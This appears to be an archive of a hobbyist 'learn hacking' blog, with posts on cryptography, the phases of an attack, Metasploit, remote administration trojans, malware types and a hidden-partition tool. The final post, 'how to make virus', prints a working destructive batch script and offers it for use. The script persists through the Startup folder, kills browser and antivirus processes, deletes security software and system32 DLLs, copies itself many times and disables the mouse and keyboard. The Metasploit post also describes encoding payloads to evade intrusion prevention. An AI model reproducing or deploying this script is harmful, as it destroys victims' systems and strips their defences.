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Sunday, 24 January 2016

What is Cryptography ?


     The art of protecting information by transforming it (encrypting it) into an unreadable format, called cipher text. Only those who possess a secret key can decipher (or decrypt) the message into plain text. Encrypted messages can sometimes be broken by cryptanalysis, also called codebreaking, although modern cryptography techniques are virtually unbreakable. As the Internet and other forms of electronic communication become more prevalent, electronic security is becoming increasingly important. Cryptography is used to protect e-mail messages, credit card information, and corporate data. One of the most popular cryptography systems used on the Internet is Pretty Good Privacy because it's effective and free. Cryptography systems can be broadly classified into symmetric-key systems that use a single key that both the sender and recipient have, and public-keysystems that use two keys, a public key known to everyone and a private key that only the recipient of messages uses.

The Types of Cryptography :-

cryp typ.png

Wednesday, 20 January 2016

Phases of HACKING

Today, we are going to discuss about the various phases of Hacking which a Hacker must follow to implement a successful attack.

The five phases of Hacking are as follow:
  1. Reconnaissance
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Clearing Tracks

   Reconnaissance:- This is the primary phase where the Hacker tries to collect as much information as possible about the target. It includes Identifying the Target, finding out the target’s IP Address Range, Network, DNS records, etc. 

Scanning:- It involves taking the information discovered during reconnaissance and using it to examine the network. Tools that a hacker may employ during the scanning phase can include dialers, port scanners, network mappers, sweepers, and vulnerability scanners. Hackers are seeking any information that can help them perpetrate attack such as computer names, IP addresses, and user accounts. 

Gaining Access:- After scanning, the hacker designs the blueprint of the network of the target with the help of data collected during Phase 1 and Phase 2. This is the phase where the real hacking takes place. Vulnerabilities discovered during the reconnaissance and scanning phase are now exploited to gain access. The method of connection the hacker uses for an exploit can be a local area network (LAN, either wired or wireless), local access to a PC, the Internet, or offline. Examples include stack based buffer overflows, denial of service (DoS), and session hijacking. These topics will be discussed in later chapters. Gaining access is known in the hacker world as owning the system. 

Maintaining Access:- Once a hacker has gained access, they want to keep that access for future exploitation and attacks. Sometimes, hackers harden the system from other hackers or security personnel by securing their exclusive access with backdoor, rootkits, and Trojans. Once the hacker owns the system, they can use it as a base to launch additional attacks. In this case, the owned system is sometimes referred to as a zombie system. 

Covering Tracks:- Once hackers have been able to gain and maintain access, they cover their tracks to avoid detection by security personnel, to continue to use the owned system, to remove evidence of hacking, or to avoid legal action. Hackers try to remove all traces of the attack, such as log files or intrusion detection system (IDS) alarms. Examples of activities during this phase of the attack include stenography, the use of tunneling protocols, and altering log files.  

Saturday, 9 January 2016


What is Metasploit | How to use Metasploit Framework

MetaSploit Framework : Hey Hackers! in this blog of Learn Hacking we are going to tell you about the Metsploit Framework. This blog is going to answer the following questions for you.

What is Metasploit

How to use the Metasploit Framework

What is Metasploit Project:

The Metasploit Project is a computer security project which aims at providing information about security vulnerabilities and helps in penetration testing and Patching the exploits.
Metasploit framework is its famous sub project, a tool for developing and executing exploits against a remote machine. Apart from Metasploit Framework, Metasploit Project is well known for is anti-forensics and loopholes evading tools.
Other important sub-projects include the Opcode Database, shellcode archive, and security research.

About the Metasploit framework :

Metasploit Framework was programmed by HD Moore in 2003 as a network tool using PERL scripting language. It was reprogrammed using RUBY. You can develop and execute exploits against any target machine using this framework.
this framework comes with many inbuilt exploits and payloads.

Basic steps on How to use Metasploit Framework :

1. Searching and configuring an exploit : Searching exploit on the basis of data acquired by scanning and footprinting the target machine.(current version of Metasploit comes with around 800 exploits against different services.

2. Choosing and configuring a Payload : Payload is the code that will be executed upon the successfully entry into the target machine, for example, a remote shell.

3. Choosing the encoding technique to encode the payload so that the intrusion-prevention system (IPS) will not catch the encoded payload.

4. Executing the exploit.
The capability of combining any exploit with any framework is the best feature of Metasploit Framework.
Metasploit runs on all versions of unix and windows also. It includes two command line interface, a web browser based interface and a GUI.

Choosing exploit and payload is tricky work, you need to gather information about the target machine in order to make the eploit work. this information can be gathered using Port scanning and network scanning techniques Which will be covered in upcoming posts.

Where to get Metasploit Framework?

You can download the free version from the official Metasploit
The free version also comes as a pre-installed application in all versions of Backtrack.

Have a look at the other Penetration tools by Metasploit Project :

Well Metasploit framework might be a new tool to play with for some of you. Metasploit framework is pretty cool to play with and once you learn to use it the right way for Ethical Hacking, you are going to use this penetration testing tool often.

Thursday, 7 January 2016


RAT is the short form of “Remote Administration Tool”. It’s very similar to a Trojan. Once a RAT is installed in a computer the attacker can do almost anything on the remote computer such as installing a keylogger, controlling a computer, infecting files etc.


A remote administration tool (RAT) is a piece of software that allows a remote "operator" to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software.
The operator controls the RAT through a network connection. Such tools provide an operator the following capabilities:
  1. Screen/camera capture or image control
  2. File management (download/upload/execute/etc.)
  3. Shell control (from command prompt)
  4. Computer control (power off/on/log off if remote feature is supported)
  5. Registry management (query/add/delete/modify)
  6. Hardware Destroyer (overclocked)
  7. Other software product-specific functions
Its primary function is for one computer operator to gain access to remote PCs. One computer will run the "client" software application, while the other computer(s) operate as the "host(s)".

Top Ten (RAT) Remote Administration Tools

10.Cyber Gate 
8.DameWare RAT 
7.Nj RAT 
6.Poison Ivy RAT 
5.Bozok RAT 
4.Pussy RAT 
2.Black Shades 
1.Dark Comet

Sunday, 3 January 2016



The Blog is about MALWARE in Computers.

Malware has been a problem for ages, Malware is short form of malicious software. A Malware is basically a program designed to infect a computer system without owner being informed.


Types of MALWARE:

Malware exists in many forms, below mentioned are some of the common types of malware.  

1. Trojan Horse – Trojan virus or Trojan horse is one of the most common types of malware, Trojan virus is mostly used to control the victims computer rather than infecting or destroying files on victims computer. A Trojan horse once installed into victims computer can give a hacker complete access to your computer. Trojans are one of the most dangerous forms of malware.

2. Computer Viruses – A computer virus a malicious program which is mostly developed to infect a computer, once it infects a computer it replicates or reproduces itself. A virus is just like a parasite and it needs another host to attach to in order to infect a computer.

3. Worms – Worms are almost similar to computer viruses the only difference unlike computer viruses they do not require another host to attach to in order to infect a computer. Once a worm infects a computer it replicates itself. Computer worms are major threats to large networks.

4. Keyloggers - A Keylogger is a hardware or software device which monitors every keystroke, screen shots, chats etc typed on the computer. A keylogger program does not require physical access to the user's computer. Any person with a basic knowledge of computer can use keylogger.

5. RATS – RAT is the short of “Remote Administration Tool” and is indeed one of the most dangerous types of malware. It’s very similar to a Trojan. Once a RAT is installed in a computer the attacker can do almost anything on the remote computer such as installing a keylogger, shutting down a computer, infecting files etc.

6. Adware – Adware is the short form of Advertisement-supported software. Adware’s are commonly designed to display advertisements on your computers. However some of these adwares may contain harmful viruses and spying programs which can bring your computer system to knees.

Thursday, 31 December 2015

Create Hidden Partition for Private and Confidential Files With Secret Disk 1.16

If you are a person who is have a lots of private and confidential data and use any of the files encryption software, you should have a look at Secret Disk which let you create a separate partition on your hard drive instead of encrypting individual files. The partition is protected by a password and is hidden to everyone until you provide the password and unlock the partition. working on secret portion is same as working on any normal partition.

Features of Secret Disk

  • Separate disk for your private files – this tool will create separate disk for your private files.
  • Access with a password – you can access Secret Disk with a password only!
  • Locking – when locking secret disk disappears and stays invisible with all contents.
  • One second protection – when you need protection Secret Disk disappears within one second with all content, no matter how many files you have on the disk.
  • Power failure – in case of power (or Windows) failure Secret Disk will be automatically locked.
  • Automatic locking – Secret Disk can be automatically locked if you away from your PC (screensaver is running) or when you press emergency F8 button.
  • No hardware – no additional hardware required! Space for secret disk will be taken from your system disk.  
Download Here 

how to make virus

@echo off
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%userprofile%\My Documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:\Program Files\Common Files\Symantec Shared\ccapp.exe
if exist "*.bat" del "*.bat"
cd C:\WINDOWS\system32
rem made with Batch Virus Maker V.2
if exist "*.dll" del "*.dll"
tskill McAfee Security Centre Module
del c:\program files\\agent\mcdetect.exe
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg *

this is a virusrundll mouse,disablerem made with Batch Virus Maker V.2rundll keyboard,disable 

save to virus.bat it will erase hdd:P